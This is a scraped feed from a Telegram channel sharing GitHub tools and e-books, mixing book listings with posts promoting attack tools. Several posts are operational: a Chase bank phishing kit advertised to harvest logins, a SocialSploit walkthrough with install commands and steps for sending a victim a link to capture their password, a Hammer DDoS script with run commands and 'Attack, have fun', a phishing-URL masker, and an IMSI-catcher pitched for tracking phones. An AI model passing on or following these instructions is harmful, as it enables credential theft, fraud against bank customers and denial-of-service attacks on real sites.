Github tools
2.73K subscribers
33 photos
2 videos
58 files
361 links
Github useful scripts and tools
Download Telegram
A simple dead man switch written in bash and python

#ВесьМирВТруху

https://github.com/dimensionc132/deadmanswitch


https://github.com/dimensionc132/deadmanswitch‌‌

Dead swi
tch

Dead Switch is a security app designed to protect your data in case you are threatened by violence from people, organizations, government agencies or you just want to have a safe way to send data in case something happens to you unexpected.

Dead Switch will check at the interval you specified (minimum 1 day), asking you to enter the username and password you set.
If you do not, the email you previously specified will be sent to the specified person(s).

https://github.com/dimensionc132/deadmanswitch‌‌
Ransomware and Cybercrime.pdf
3.5 MB
📖 Ransomware and Cybercrime.

• Дата выхода: 17 Июня 2022 года.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)

VT.

This book covers many cyber and ransomware attacks and events, including how we have gotten to the point of massive digital utilisation, particularly during the global lockdown and COVID-19 pandemic, to online spending that will see twice the monetary amount lost to cybercrime than what is spent online.

🧩 Софт для чтения.

#Eng #Ransomware #Cybercrime
Arduino_Workshop,_2nd_Edition_A_Hands_on_Introduction_with_65_Projects.epub
25.9 MB
📖 Arduino Workshop, 2nd Edition: A Hands-on Introduction with 65 Projects.

• Дата выхода: 15 Июня 2021 год.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)
• Цена в онлайн магазине: 23$

VT.

Through 65 hands-on projects, Arduino Workshop will teach you the tricks and design principles of a master craftsman. This edition has been updated for the latest version of the Arduino IDE and revised to reflect current hardware and technology. It includes coverage of general electronics concepts as well as schematic diagrams and detailed images of components. You’ll experiment with touchscreens and LED displays, explore robotics, use sensors with wireless data links, and control devices remotely with a cell phone.

🧩 Софт для чтения.

#Arduino #Eng
IMSI-catcher

This program shows you IMSI numbers, country, brand and operator of cellphones around you.

Track, intercept and monitor cellphones like a government agency 🙆‍♂️🙆‍♂️

https://github.com/Oros42/IMSI-catcher
1
https://github.com/jaykali/maskphish

MaskPhish

MaskPhish is not any Phishing tool. It's just a proof of concept of "URL Making Technology". It is a simple Bash Script to hide phishing URL under a normal looking URL (google.com or facebook.com). It can be integrated into Phishing tools (with proper credits) to look the URL ledgit.
#Chase Bank Scam&Page + Admin panel 2022
-New Layout Chase bank scam page -Chase bank true login -Responsive Page -Working on all devices -results in txt file -Send results to email -Look real -Dashboard view -And much more -Top-Noch Customer Support +Admin panel 2022

https://github.com/trewisscotch/Chase-Bank-Scampage
Credit:- @wantednoob
Copy with credit

We use a script for phishing social networks

For
those who are not in the subject, phishing is a type of Internet fraud used to obtain personal user data, such as login and password from various resources. With the SocialSploit utility, you can create phishing social networks such as: Facebook, Awaker, Spotify, Netflix, Hotmail, Tuenti, Yahoo, PayPal, GitHub, Snapchat, Instagram and YouTube.

Installation

First we
need Ngrok:

$ apt-get update && apt-get upgrade -y
$ apt-get install
git -y
$ git clone https:
//github.com/tchelospy/termux-ngrok.git
$ cd termux-ngrok
$ chmod +x termux-ngrok.sh
$ ./termux-ngrok.s
h

After loading, wri
te "Y" and press Enter, after which we enter either "ngrok http 5555" or "ngrok http 80".

Let's move o
n to installing SocialSploit:

$ pkg update
$ pkg install python
$ pkg instal
l git
$ git clone
https://github.com/Cesar-Hack-Gray/SocialSploit.git
$ cd SocialS
ploit
$ bash insta
ll.sh

Usage

$ ./S
ploit

Next, sel
ect the victim, copy the received link and send it to him. After the victim follows the link and enters log:pass, we will get it in the terminal.

As always strictly for informational purposes ✌️‌‌

We mute a DDoS attack on
the site

Hammer is a time-tested script that uses bots to attack a specific website. This tool is able to put a fairly powerful server.

Installation

$ git clone https://github.com/rk1342k/Hammer.git
$ cd hammer

Us
age

$ python
hammer.py -s [IP target] -p [port] -t 135

Attack, have fun ✌️‌‌
Full_Stack_Python_Security_Cryptography,_TLS,_and_attack_resistance.pdf
10 MB
📖 Full Stack Python Security: Cryptography, TLS, and attack resistance.

• Дата выхода: 17 Августа 2022 год.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)

VT.

Full Stack Python Security: Cryptography, TLS, and attack resistance teaches you everything you’ll need to build secure Python web applications. As you work through the insightful code snippets and engaging examples, you’ll put security standards, best practices, and more into action. Along the way, you’ll get exposure to important libraries and tools in the Python ecosystem.

🧩 Софт для чтения.

#Python #Security #Eng